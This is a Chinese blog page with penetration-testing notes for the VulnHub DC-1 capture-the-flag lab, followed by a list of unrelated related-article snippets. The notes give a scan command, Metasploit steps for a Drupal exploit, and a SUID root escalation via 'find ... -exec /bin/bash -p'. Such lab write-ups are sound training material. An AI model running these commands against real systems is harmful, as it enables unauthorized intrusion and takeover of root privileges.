当前位置: 首页 > article >正文

Vulnhub靶场DC-1 渗透测试笔记

article 2026/5/7 1:30:45
靶场地址​​​​​​DC: 1 ~ VulnHub信息打点kali扫描存活网段ip,排除kali本身得到靶场ip192.168.72.137端口全扫描nmap -A 192.168.72.137拿到webshell指纹识别查找历史漏洞search drupaluse 1show options(查看配置)set rhosts 192.168.72.137run通过msf进入shell查看泄露信息flag1.txtshelllscat flag1.txtEvery good CMS needs a config file - and so do you.翻译过来就是每一个内容管理系统都需要配置文件提示找配置文件固定得到了flag2和数据库配置信息flag2提示提升权限为root来查看敏感文件或者直接爆破suid提权find / -perm -4000 -type f 2/dev/null查找可以用的suid提权find . -exec /bin/bash -p \; -quit(提权命令)id/whoami(提权验证)这里推荐几个综合提权项目可以通过上传对系统进行初步测试https://github.com/carlospolop/PEASS-nghttps://github.com/diego-treitos/linux-smart-enumerationhttps://github.com/redcode-labs/Basharkhttps://github.com/rebootuser/LinEnum插件提权upload /home/kali/lse.sh /tmp/lse.sh上传检测脚本ls -al /tmp(查看是否上传成功)chmod 755 /tmp/lse.sh给到执行权限bash /tmp/lse.sh运行)拿到通关flagls -al /rootcat /root/thefinalflag.txt总结1.思路web入口webshellflag1数据库flag2提权flag4.txt2.综合提权脚本只能进行初步检测为我们提供权限提升方向

相关文章:

Vulnhub靶场DC-1 渗透测试笔记

靶场地址 ​​​​​​DC: 1 ~ VulnHub 信息打点 kali扫描存活网段ip,排除kali本身得到靶场ip192.168.72.137 端口全扫描 nmap -A 192.168.72.137 拿到webshell 指纹识别 查找历史漏洞 search drupal use 1 show options(查看配置) set rhosts 192.168.72.137 run 通过…...

编程日记 2026/5/7 1:30:45

云原生应用多集群管理:从设计到实践

云原生应用多集群管理:从设计到实践 一、多集群管理的概念与价值 1.1 多集群管理的定义 多集群管理是指在云原生环境中,对多个 Kubernetes 集群进行统一管理和协调的实践。随着企业规模的扩大和业务需求的增长,单一集群往往难以满足所有需求&…...

编程日记 2026/5/7 1:28:45

phpwind_UTF8_8.5部署步骤详解(附PHPWind论坛搭建与本地环境配置)

phpwind_UTF8_8.5.zip是 PHPWind 8.5 论坛系统的安装包,这不是一个直接双击运行的 exe,而是一个网站源码包。要想跑起来,得先把 PHP MySQL Web 服务器(比如 Apache)的环境搭好,再把这包里的文件放进去。 …...

编程日记 2026/5/7 1:28:45

Artisan咖啡烘焙软件:开源烘焙曲线控制的终极解决方案

Artisan咖啡烘焙软件:开源烘焙曲线控制的终极解决方案 【免费下载链接】artisan artisan: the worlds most trusted roasting software 项目地址: https://gitcode.com/gh_mirrors/ar/artisan Artisan是世界上最受信赖的开源咖啡烘焙软件,为专业烘…...

编程日记 2026/5/7 1:28:45

终极JSXBIN解码器深度解析:高性能Adobe脚本反编译引擎架构设计

终极JSXBIN解码器深度解析:高性能Adobe脚本反编译引擎架构设计 【免费下载链接】jsxer A fast and accurate JSXBIN decompiler. 项目地址: https://gitcode.com/gh_mirrors/js/jsxer 在Adobe创意生态系统中,JSXBIN格式作为ExtendScript脚本的二进…...

编程日记 2026/5/7 1:26:44

轻量级爬虫框架ClawLite:模块化设计与反爬策略实践

1. 项目概述:一个轻量级、模块化的网络爬虫框架最近在整理自己的工具库,翻到了一个几年前写的爬虫项目,当时给它起了个名字叫“ClawLite”。这个名字挺直白的,“Claw”就是爪子,抓取的意思,“Lite”意味着轻…...

编程日记 2026/5/7 1:26:44

h2oGPT:私有化部署本地大语言模型,实现安全高效的文档问答与多模态AI应用

1. 项目概述:为什么我们需要一个私有的、全能的本地大语言模型应用?如果你和我一样,对AI助手既爱又恨,那你肯定懂我的纠结。爱的是它强大的信息处理和生成能力,恨的是每次把公司文档、个人笔记甚至一些敏感想法喂给云端…...

编程日记 2026/5/7 1:26:44

AutoGPT.js:浏览器内AI智能体开发与部署全指南

1. 项目概述:在浏览器里跑一个AI副驾驶 最近在折腾AI应用开发的朋友,估计都绕不开AutoGPT这个项目。它把大语言模型(LLM)变成了一个能自主思考、执行任务的智能体,想法很酷,但部署起来对新手来说门槛不低&…...

编程日记 2026/5/7 1:26:44

Poe-OpenAI代理:统一多模型API调用与协议转换实战

1. 项目概述:当Poe遇上OpenAI API 如果你和我一样,既沉迷于Claude、ChatGPT这些大模型的能力,又对OpenAI官方API那套简洁统一的调用方式情有独钟,那你肯定也遇到过这个痛点:想用一个统一的接口去调用不同厂商、不同能…...

编程日记 2026/5/7 1:26:43

别再为6D位姿估计数据发愁了!手把手教你用BlenderProc(Python 3.8 + Conda)合成自己的数据集

从零构建6D位姿估计合成数据集:BlenderProc实战指南 在计算机视觉领域,6D位姿估计正成为机器人抓取、增强现实等应用的核心技术。然而获取真实场景下的标注数据往往耗时费力——这正是BlenderProc的用武之地。这个基于Blender的Python工具链能快速生成带…...

编程日记 2026/5/7 1:24:42

利用快马平台快速生成51单片机温湿度监测原型,加速硬件验证流程

利用51单片机快速搭建温湿度监测原型 最近在做一个智能家居的小项目,需要用到温湿度监测功能。作为嵌入式开发新手,我选择了经典的STC89C52单片机作为主控,搭配DHT11传感器和1602液晶屏来实现这个功能。整个过程让我深刻体会到,在…...

编程日记 2026/5/7 1:24:42

C语言完美演绎9-22

/* 范例&#xff1a;9-22 */#include <stdio.h>struct mystruct{int i;char str[10];};int main(int argc,char *argv[]){FILE *fp1;struct mystruct s{97,"ABCDEF"};float a66.14;char bC;int i;if ((fp1 fopen(argv[1], "w")) NULL){fprintf(std…...

编程日记 2026/5/7 1:24:42

AI赋能开发:在快马平台打造智能代码注释生成与解释超级技能

最近在尝试用AI提升开发效率时&#xff0c;发现给老项目补注释是个特别耗时的活儿。于是基于InsCode(快马)平台的AI能力&#xff0c;做了个智能注释生成工具&#xff0c;效果出乎意料的好。分享下实现思路和具体操作&#xff1a; 核心功能设计 文件读取模块&#xff1a;用Pytho…...

编程日记 2026/5/7 1:24:42

DMS MCP Server实战:基于MCP协议与AI的数据库安全智能查询

1. 项目概述&#xff1a;当AI遇上数据库管理&#xff0c;DMS MCP Server如何重塑数据访问体验 如果你是一名数据库管理员&#xff08;DBA&#xff09;、数据分析师&#xff0c;或者是一位需要频繁与数据库打交道的开发者&#xff0c;那么你一定对这样的场景不陌生&#xff1a;…...

编程日记 2026/5/7 1:24:42

在RK3588上跑ROS Noetic,Rviz和Gazebo报错别慌,试试这几行命令

在RK3588上跑ROS Noetic&#xff1a;Rviz和Gazebo报错终极排障指南 当你兴奋地在RK3588开发板上装好ROS Noetic&#xff0c;准备大展拳脚时&#xff0c;Rviz和Gazebo却突然给你泼了一盆冷水——黑屏、闪退或是满屏的错误提示。别急着怀疑人生&#xff0c;这其实是RK3588的Mali…...

编程日记 2026/5/7 1:22:41

多智能体协同进化框架Socratic-Zero在数学推理中的应用

1. 项目背景与核心价值去年在开发教育科技产品时&#xff0c;我遇到了一个棘手问题&#xff1a;现有的数学解题AI要么只能处理固定题型&#xff0c;要么在复杂推理链中频繁出错。这促使我开始探索多智能体协同进化的可能性&#xff0c;最终形成了Socratic-Zero框架。这个框架的…...

编程日记 2026/5/7 1:22:41

设计指南:核心原则与实践方法

设计是一门融合科学原理与审美直觉的综合性学科。无论是界面设计、品牌设计还是产品设计&#xff0c;优秀的设计作品都能在传递信息的同时给用户带来愉悦的视觉体验。然而&#xff0c;很多设计师在实践中常常陷入创意瓶颈或产出质量不稳定的问题。系统化的设计指南能够帮助设计…...

编程日记 2026/5/7 1:22:41

WebWorld:高保真网络仿真与多智能体训练实践

1. 项目背景与核心价值去年我在参与一个多智能体协作项目时&#xff0c;发现现有仿真环境存在严重局限性——要么场景过于简单无法反映真实网络复杂性&#xff0c;要么运行效率低下难以支持大规模训练。这促使我开始探索构建WebWorld这个开放网络世界模型。经过半年多的迭代&am…...

编程日记 2026/5/7 1:22:41

Xournal++ 5分钟快速上手:免费开源的数字笔记与PDF批注神器

Xournal 5分钟快速上手&#xff1a;免费开源的数字笔记与PDF批注神器 【免费下载链接】xournalpp Xournal is a handwriting notetaking software with PDF annotation support. Written in C with GTK3, supporting Linux (e.g. Ubuntu, Debian, Arch, SUSE), macOS and Windo…...

编程日记 2026/5/7 1:22:41

实战指南:利用快马平台为你的android应用快速集成ai图像识别

实战指南&#xff1a;利用快马平台为你的Android应用快速集成AI图像识别 最近在做一个宠物识别App时&#xff0c;需要快速集成图像识别功能。传统开发流程需要自己搭建模型、处理API调用、编写大量样板代码&#xff0c;整个过程相当耗时。后来发现InsCode(快马)平台能智能生成…...

编程日记 2026/5/7 1:20:40

如何构建现代化React音乐播放器:Tonzhon的架构设计与最佳实践

如何构建现代化React音乐播放器&#xff1a;Tonzhon的架构设计与最佳实践 【免费下载链接】tonzhon-music 铜钟 Tonzhon (tonzhon.whamon.com): 干净纯粹的音乐平台 (铜钟已不再使用 tonzhon.com&#xff0c;现在的 tonzhon.com 不是正版的铜钟) 项目地址: https://gitcode.c…...

编程日记 2026/5/7 1:20:40

Athena-Public开源框架:构建标准化、可观测数据管道的实践指南

1. 项目概述与核心价值最近在开源社区里&#xff0c;我注意到一个名为winstonkoh87/Athena-Public的项目热度持续攀升。作为一名长期关注数据工程与自动化工具链的从业者&#xff0c;我习惯性地会去探究这类项目背后的设计哲学与实用价值。Athena-Public 这个名字本身就充满了遐…...

编程日记 2026/5/7 1:20:40

从零到上线:基于快马平台AI生成代码,快速开发并部署一个全功能趣盘搜应用

今天想和大家分享一个实战案例&#xff1a;如何用InsCode(快马)平台快速开发并上线一个功能完整的文件搜索应用"趣盘搜"。整个过程从代码生成到部署只用了不到半天时间&#xff0c;特别适合需要快速验证产品想法的场景。 项目规划与框架选择 首先明确需要实现的五大核…...

编程日记 2026/5/7 1:20:40

Docker 27量子开发环境适配实战(27个真实报错日志溯源与修复清单)

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;Docker 27量子开发环境适配实战导论 Docker 27&#xff08;代号“Qubit”&#xff09;是首个原生支持量子计算模拟器调度与量子-经典混合工作流编排的容器运行时&#xff0c;其核心引入了 qemu-qsim 驱…...

编程日记 2026/5/7 1:20:40

KK-HF Patch终极指南:3步解锁Koikatu完整游戏体验与200+模组

KK-HF Patch终极指南&#xff1a;3步解锁Koikatu完整游戏体验与200模组 【免费下载链接】KK-HF_Patch Automatically translate, uncensor and update Koikatu! and Koikatsu Party! 项目地址: https://gitcode.com/gh_mirrors/kk/KK-HF_Patch 还在为Koikatu/Koikatsu P…...

编程日记 2026/5/7 1:18:40

嵌入式开发中的软件工程管理与版本控制实践

1. 软件工程管理的核心挑战在嵌入式系统开发领域&#xff0c;我们经常面临一个令人不安的悖论&#xff1a;硬件成本持续下降&#xff0c;而固件开发成本却居高不下。根据行业统计数据&#xff0c;商业级嵌入式代码的平均成本高达每行15-30美元&#xff0c;这意味着一个仅5000行…...

编程日记 2026/5/7 1:18:40

零基础入门机器学习:借助快马AI生成你的第一个手写数字识别程序

今天想和大家分享一个特别适合机器学习新手的实战项目——手写数字识别。作为零基础学习者&#xff0c;我最初被各种环境配置和代码理解劝退了好几次&#xff0c;直到发现了能一键生成可运行代码的InsCode(快马)平台&#xff0c;整个过程突然变得轻松多了。 项目准备与环境搭建…...

编程日记 2026/5/7 1:18:40

一键恢复IE 浏览器,电脑很多功能都离不开它

不少人日常习惯用主流浏览器&#xff0c;就觉得老旧的 IE 浏览器可有可无&#xff0c;其实大错特错。IE 作为 Windows 系统自带的原生浏览器&#xff0c;是系统底层核心组件之一&#xff0c;不只是单纯用来上网浏览网页。 很多政务办公系统、老旧业务后台、企业内网平台、网银…...

编程日记 2026/5/7 1:18:40

革新性OpenCore配置管理工具OCAT:一站式黑苹果配置终极解决方案

革新性OpenCore配置管理工具OCAT&#xff1a;一站式黑苹果配置终极解决方案 【免费下载链接】OCAuxiliaryTools Cross-platform GUI management tools for OpenCore&#xff08;OCAT&#xff09; 项目地址: https://gitcode.com/gh_mirrors/oc/OCAuxiliaryTools OpenCor…...

编程日记 2026/5/7 1:18:40

工业机器人闭环控制系统的轨迹优化与采样权重分配

1. 机器人闭环控制系统的轨迹优化基础在工业机器人控制领域&#xff0c;实现高精度轨迹跟踪一直是核心挑战。传统开环控制方法难以应对负载变化、关节摩擦等不确定性因素&#xff0c;而闭环控制系统通过实时反馈调节能够显著提升控制精度。闭环系统的核心在于控制器根据实际状态…...

编程日记 2026/5/7 1:16:39